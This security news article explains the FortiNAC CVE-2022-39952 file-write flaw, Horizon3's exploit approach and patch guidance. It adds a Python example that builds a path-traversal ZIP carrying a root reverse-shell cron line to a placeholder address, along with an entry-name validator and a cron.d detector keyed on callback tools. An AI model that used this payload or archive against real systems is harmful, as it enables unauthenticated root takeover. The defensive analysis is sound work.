Security researchers have released a proof-of-concept exploit for a critical vulnerability (CVE-2022-39952) in Fortinet’s FortiNAC network access control suite. Fortinet describes the flaw as external control of a file name or path in the FortiNAC web server, which lets an unauthenticated attacker write arbitrary files on the appliance.
The vulnerability affects FortiNAC versions 9.4.0, 9.2.0 through 9.2.5, 9.1.0 through 9.1.7, and all releases on the 8.8, 8.7, 8.6, 8.5, and 8.3 branches. Organizations running these versions have been urged to apply the available security updates.
How the PoC exploit works and the implications for FortiNAC users
Researchers at Horizon3 have published a technical post explaining how the vulnerability can be exploited, together with proof-of-concept (PoC) exploit code in the company’s GitHub repository. Their exploit writes a cron job into /etc/cron.d/ that fires every minute and launches a reverse shell back to the attacker as root, which amounts to unauthenticated remote code execution on the appliance.
Horizon3 found that the fix for CVE-2022-39952 removed ‘keyUpload.jsp,’ an endpoint that reads a ‘key’ parameter from the request, writes its contents to a file on disk, and then runs a bash script, ‘configApplianceXml.’ That script calls ‘unzip’ on the newly written file without validating the paths stored inside the archive, so the archive’s entry names, not the server, decide where the extracted files end up.
An attacker therefore only has to build a ZIP archive whose entry name sets the destination path of the payload, submit it to the vulnerable endpoint in the key parameter, and wait for cron to fire. Because the job runs every minute, the root reverse shell arrives within a minute. The same property makes the attack easy to spot on the host: an unexpected file in /etc/cron.d/ with an every-minute schedule is the direct artifact of this exploit.
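The two sides of the mechanism described above, shown as an added example that is not Horizon3’s PoC or any Fortinet code: an in-memory archive whose entry names carry the write location (the zip-slip primitive), the entry-name validation a hardened importer should perform before ever calling unzip, and a detector for the every-minute root cron job the article describes. The scratch directory, the sample key, the address and the cron text are constructed for illustration, and the validation is a general path check rather than a claim about how configApplianceXml invokes unzip.

```python
"""Zip-slip primitive behind CVE-2022-39952, with the check that defeats it
and a detector for the resulting /etc/cron.d persistence.

Added example, not Horizon3's PoC or FortiNAC code. All paths, addresses
and cron text below are constructed for illustration.
"""
import io
import posixpath
import re
import zipfile

# Hypothetical scratch directory a safe importer would extract into
# (assumption: any real importer would use its own fixed directory).
SAFE_DIR = "/var/tmp/key-import"

# Substrings typical of a shell callback command inside a cron entry.
SHELL_INDICATORS = ("/dev/tcp/", "bash -i", "nc ", "ncat ", "socat ", "| sh", "|sh")

# /etc/cron.d format: five schedule fields, a user, then the command.
CRON_LINE = re.compile(r"^\s*(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(.+?)\s*$")


def build_archive(entries: dict[str, bytes]) -> bytes:
    """Zip the given name -> content pairs. Names are stored verbatim, so
    '..' components or a leading '/' survive into the archive; whether
    they do damage depends entirely on how the consumer unzips it."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, data in entries.items():
            zf.writestr(name, data)
    return buf.getvalue()


def escapes(entry_name: str, base_dir: str) -> bool:
    """True if extracting entry_name under base_dir would create a file
    outside base_dir: absolute name, '..' traversal, or backslash tricks."""
    name = entry_name.replace("\\", "/")
    if posixpath.isabs(name):
        return True
    base = posixpath.normpath(base_dir)
    prefix = base if base.endswith("/") else base + "/"
    target = posixpath.normpath(posixpath.join(base, name))
    return target != base and not target.startswith(prefix)


def unsafe_entries(zip_bytes: bytes, base_dir: str = SAFE_DIR) -> list[str]:
    """Entry names a hardened importer must reject before running unzip.
    This inspects the central directory only; nothing is extracted."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        return [i.filename for i in zf.infolist() if escapes(i.filename, base_dir)]


def every_minute(schedule: tuple[str, ...]) -> bool:
    """True for a '* * * * *' (or '*/1') schedule."""
    return all(field in ("*", "*/1") for field in schedule)


def suspicious_cron_lines(cron_d_text: str) -> list[str]:
    """Lines of a /etc/cron.d file that run as root every minute and carry
    a shell-callback indicator. Comments and VAR=value lines never match."""
    hits = []
    for line in cron_d_text.splitlines():
        m = CRON_LINE.match(line)
        if not m or line.lstrip().startswith("#"):
            continue
        *schedule, user, command = m.groups()
        if user == "root" and every_minute(tuple(schedule)) and any(
            ind in command for ind in SHELL_INDICATORS
        ):
            hits.append(line.strip())
    return hits


# Constructed sample data (not captured from a real device).
SAMPLE_ARCHIVE = build_archive({
    "server.key": b"-----BEGIN PRIVATE KEY-----\nexample\n-----END PRIVATE KEY-----\n",
    # traversal relative to the extraction directory
    "../../../../etc/cron.d/nac-rce": b"* * * * * root bash -i >& /dev/tcp/203.0.113.7/4444 0>&1\n",
    # absolute path, for unzippers that honour it
    "/etc/cron.d/nac-rce-abs": b"* * * * * root bash -i >& /dev/tcp/203.0.113.7/4444 0>&1\n",
})

SAMPLE_CRON_D = """\
# constructed /etc/cron.d/nac-rce for the detector
SHELL=/bin/bash
* * * * * root bash -i >& /dev/tcp/203.0.113.7/4444 0>&1
0 3 * * * root /usr/sbin/logrotate /etc/logrotate.conf
"""

if __name__ == "__main__":
    print("entries a safe importer must reject:", unsafe_entries(SAMPLE_ARCHIVE))
    print("suspicious cron.d lines:", suspicious_cron_lines(SAMPLE_CRON_D))
```

The importer check runs against the archive’s central directory before anything is written, which is the only point at which the destination can still be refused; relying on unzip to strip dangerous components is an implementation detail of one unzip build and not a contract. The cron detector is deliberately narrow (root, every minute, callback indicator) so it can be run over every file in /etc/cron.d/ on a FortiNAC host without drowning in routine jobs.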
To protect against CVE-2022-39952, FortiNAC administrators should urgently upgrade to 9.4.1 or later, 9.2.6 or later, 9.1.8 or later, or 7.2.0 or later. No fixed release is listed for the affected 8.x branches, so those deployments need to move to one of the fixed branches. After upgrading, confirm that the keyUpload.jsp endpoint is no longer served and audit /etc/cron.d/ for jobs you did not create, since a file there is the trace an earlier compromise would leave behind.